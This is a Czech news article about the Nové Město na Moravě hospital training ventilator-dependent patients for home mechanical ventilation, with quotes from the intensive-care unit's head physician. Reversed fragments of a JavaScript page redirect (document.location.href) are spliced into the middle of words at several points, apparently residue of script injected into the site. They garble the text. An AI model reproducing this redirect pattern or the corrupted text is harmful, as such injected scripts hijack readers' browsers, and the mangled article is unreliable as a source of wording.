Rainbow page separator

Pacienti s umělou plicní ventilací mohou žít i doma

Středa, 25. prosince 2019

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Zatím deset pacientů připravili v novoměstské nemocnici pro domácí umělou plicní ventilaci (DUPV). Jde o způsob, jak zajistit základní životní funkci za pomoci ventilá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru, který zabezpečuje dýchání, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v pacien[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tově domácím prostředí. Pokud ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to způsob není možný ze sociálních důvodů, pacient je odkázán na doživotní hospitalizaci v nemocnici.
Novoměstská nemocnice jako jediná nemocnice zřizovaná krajem disponuje oddělením následné intenzivní péče (NIP), které je určeno hlavně pro pacienty, již jsou závislí na podpoře dýchání přístrojem pro umělou plicní ventilaci i pro ty, kteří vyžadují dlouhodobou intenzivní lékařskou péči. „Převážně se jedná o pacienty s chronickým onemocněním, po těžkých traumatech, po komplikovaných operačních výkonech, s neurologickým onemocněním, v septických stavech,“ vysvětlila vedoucí lékařka oddělení NIP Eva Kutalová.
Jedním z cílů tamní péče je příprava nemocného pro domácí umělou plicní ventilaci. „Jestliže není možné pacienta do tří měsíců odpojit od přístrojů, pak se ho pokusíme připravit právě do programu DUPV,“ sdělila lékařka.